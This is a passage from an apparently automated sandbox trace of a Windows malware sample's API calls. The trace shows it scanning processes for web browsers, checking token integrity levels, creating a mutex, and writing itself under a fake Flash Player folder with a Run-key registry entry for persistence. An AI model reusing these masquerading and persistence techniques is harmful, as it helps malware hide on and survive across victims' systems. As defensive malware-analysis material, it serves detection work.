(lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0327.676] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0327.676] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0327.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0327.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0xb4 [0327.677] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0327.677] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0327.677] GetLastError () returned 0x7a [0327.677] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0327.677] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0327.677] CloseHandle (hObject=0xb8) returned 1 [0327.677] CloseHandle (hObject=0xb4) returned 1 [0327.677] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0327.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0xb4 [0327.678] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x96920, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0327.678] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0327.678] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0327.678] GetLastError () returned 0x7a [0327.678] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0327.678] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0327.678] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0327.678] CloseHandle (hObject=0xb8) returned 1 [0327.679] CloseHandle (hObject=0xb4) returned 1 [0327.679] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0327.679] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0327.679] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0327.679] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0327.679] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0327.679] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0327.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0xb4 [0327.679] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0327.679] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0327.680] GetLastError () returned 0x7a [0327.680] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0327.680] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0327.680] CloseHandle (hObject=0xb8) returned 1 [0327.680] CloseHandle (hObject=0xb4) returned 1 [0327.680] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0327.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0xb4 [0327.680] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x97020, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0327.680] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0327.681] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0327.681] GetLastError () returned 0x7a [0327.681] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0327.681] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0327.681] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0327.681] CloseHandle (hObject=0xb8) returned 1 [0327.681] CloseHandle (hObject=0xb4) returned 1 [0327.681] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0327.681] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0327.681] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0327.682] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0327.682] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0327.682] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0327.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0327.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0xb4 [0327.682] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0327.682] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0327.682] GetLastError () returned 0x7a [0327.682] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0327.682] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0327.683] CloseHandle (hObject=0xb8) returned 1 [0327.683] CloseHandle (hObject=0xb4) returned 1 [0327.683] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0327.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0xb4 [0327.683] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x97928, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0327.683] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0327.683] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0327.683] GetLastError () returned 0x7a [0327.683] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0327.684] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0327.684] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0327.684] CloseHandle (hObject=0xb8) returned 1 [0327.684] CloseHandle (hObject=0xb4) returned 1 [0327.684] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0327.684] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0327.684] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0327.684] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0327.684] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0327.684] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0327.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xb4 [0327.685] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0327.685] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0327.685] GetLastError () returned 0x7a [0327.685] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0327.685] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0327.685] CloseHandle (hObject=0xb8) returned 1 [0327.685] CloseHandle (hObject=0xb4) returned 1 [0327.686] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0327.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xb4 [0327.686] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x97cd0, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0327.686] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0327.686] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0327.686] GetLastError () returned 0x7a [0327.686] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0327.686] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0327.686] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0327.687] CloseHandle (hObject=0xb8) returned 1 [0327.687] CloseHandle (hObject=0xb4) returned 1 [0327.687] lstrcmpiW (lpString1="firefox.exe", lpString2="reader_sl.exe") returned -1 [0327.687] lstrcmpiW (lpString1="chrome.exe", lpString2="reader_sl.exe") returned -1 [0327.687] lstrcmpiW (lpString1="opera.exe", lpString2="reader_sl.exe") returned -1 [0327.687] lstrcmpiW (lpString1="iexplore.exe", lpString2="reader_sl.exe") returned -1 [0327.687] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="reader_sl.exe") returned -1 [0327.687] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="reader_sl.exe") returned -1 [0327.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xb4 [0327.687] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0327.687] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0327.688] GetLastError () returned 0x7a [0327.688] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0327.688] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0327.688] CloseHandle (hObject=0xb8) returned 1 [0327.688] CloseHandle (hObject=0xb4) returned 1 [0327.688] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0327.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xb4 [0327.688] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x97e68, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0327.688] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0327.689] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0327.689] GetLastError () returned 0x7a [0327.689] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0327.689] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0327.689] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0327.689] CloseHandle (hObject=0xb8) returned 1 [0327.689] CloseHandle (hObject=0xb4) returned 1 [0327.689] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0327.689] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0327.690] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0327.690] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0327.690] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0327.690] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0327.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x594) returned 0xb4 [0327.690] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0327.690] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0327.690] GetLastError () returned 0x7a [0327.690] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0327.690] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0327.691] CloseHandle (hObject=0xb8) returned 1 [0327.691] CloseHandle (hObject=0xb4) returned 1 [0327.691] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0327.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x594) returned 0xb4 [0327.691] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x98380, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0327.691] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0327.691] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0327.691] GetLastError () returned 0x7a [0327.691] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0327.692] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0327.692] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0327.692] CloseHandle (hObject=0xb8) returned 1 [0327.692] CloseHandle (hObject=0xb4) returned 1 [0327.692] lstrcmpiW (lpString1="firefox.exe", lpString2="upde25b4796.exe") returned -1 [0327.692] lstrcmpiW (lpString1="chrome.exe", lpString2="upde25b4796.exe") returned -1 [0327.692] lstrcmpiW (lpString1="opera.exe", lpString2="upde25b4796.exe") returned -1 [0327.692] lstrcmpiW (lpString1="iexplore.exe", lpString2="upde25b4796.exe") returned -1 [0327.692] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="upde25b4796.exe") returned -1 [0327.692] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="upde25b4796.exe") returned -1 [0327.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x57c) returned 0x0 [0327.693] VirtualFree (lpAddress=0x90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0327.693] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x0 Thread: id = 219 os_tid = 0x718 [0313.183] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0313.184] wvnsprintfW (in: pszDest=0x248efe8, cchDest=3, pszFmt="%02X", arglist=0x248efc4 | out: pszDest="B3") returned 2 [0313.184] wvnsprintfW (in: pszDest=0x248efe8, cchDest=3, pszFmt="%02X", arglist=0x248efc4 | out: pszDest="F6") returned 2 [0313.184] wvnsprintfW (in: pszDest=0x248efe8, cchDest=3, pszFmt="%02X", arglist=0x248efc4 | out: pszDest="E5") returned 2 [0313.184] wvnsprintfW (in: pszDest=0x248efe8, cchDest=3, pszFmt="%02X", arglist=0x248efc4 | out: pszDest="3F") returned 2 [0313.184] wvnsprintfW (in: pszDest=0x248efe8, cchDest=3, pszFmt="%02X", arglist=0x248efc4 | out: pszDest="12") returned 2 [0313.184] wvnsprintfW (in: pszDest=0x248efe8, cchDest=3, pszFmt="%02X", arglist=0x248efc4 | out: pszDest="0A") returned 2 [0313.184] wvnsprintfW (in: pszDest=0x248efe8, cchDest=3, pszFmt="%02X", arglist=0x248efc4 | out: pszDest="5B") returned 2 [0313.184] wvnsprintfW (in: pszDest=0x248efe8, cchDest=3, pszFmt="%02X", arglist=0x248efc4 | out: pszDest="E5") returned 2 [0313.184] wvnsprintfW (in: pszDest=0x248efe8, cchDest=3, pszFmt="%02X", arglist=0x248efc4 | out: pszDest="82") returned 2 [0313.184] wvnsprintfW (in: pszDest=0x248efe8, cchDest=3, pszFmt="%02X", arglist=0x248efc4 | out: pszDest="5B") returned 2 [0313.184] wvnsprintfW (in: pszDest=0x248efe8, cchDest=3, pszFmt="%02X", arglist=0x248efc4 | out: pszDest="9C") returned 2 [0313.184] wvnsprintfW (in: pszDest=0x248efe8, cchDest=3, pszFmt="%02X", arglist=0x248efc4 | out: pszDest="06") returned 2 [0313.184] wvnsprintfW (in: pszDest=0x248efe8, cchDest=3, pszFmt="%02X", arglist=0x248efc4 | out: pszDest="15") returned 2 [0313.184] wvnsprintfW (in: pszDest=0x248efe8, cchDest=3, pszFmt="%02X", arglist=0x248efc4 | out: pszDest="9B") returned 2 [0313.184] wvnsprintfW (in: pszDest=0x248efe8, cchDest=3, pszFmt="%02X", arglist=0x248efc4 | out: pszDest="B3") returned 2 [0313.184] wvnsprintfW (in: pszDest=0x248efe8, cchDest=3, pszFmt="%02X", arglist=0x248efc4 | out: pszDest="F4") returned 2 [0313.184] CreateMutexW (lpMutexAttributes=0x877e4, bInitialOwner=0, lpName="B3F6E53F120A5BE5825B9C06159BB3F4") returned 0x4c [0313.184] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0328.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x248edfe, cbMultiByte=76, lpWideCharStr=0x248ec54, cchWideChar=150 | out: lpWideCharStr="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exeɈɈɈɈĥɈ誵\x07Ɉ\x04") returned 76 [0328.088] PathCombineW (in: pszDest=0x248f09c, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" [0328.088] PathQuoteSpacesW (in: lpsz="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" | out: lpsz="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\"") returned 1 [0328.088] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xe4 [0328.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x43c708, cbMultiByte=45, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0328.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x43c708, cbMultiByte=45, lpWideCharStr=0x43c748, cchWideChar=46 | out: lpWideCharStr="Software\\Microsoft\\Windows\\Currentversion\\Run") returned 45 [0328.088] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\Currentversion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x12, lpSecurityAttributes=0x0, phkResult=0x248f344, lpdwDisposition=0x0 | out: phkResult=0x248f344*=0xb4, lpdwDisposition=0x0) returned 0x0 [0328.088] RegSetValueExW (in: hKey=0xb4, lpValueName="roottools.exe", Reserved=0x0, dwType=0x1, lpData="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\"", cbData=0xe2 | out: lpData="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\"") returned 0x0 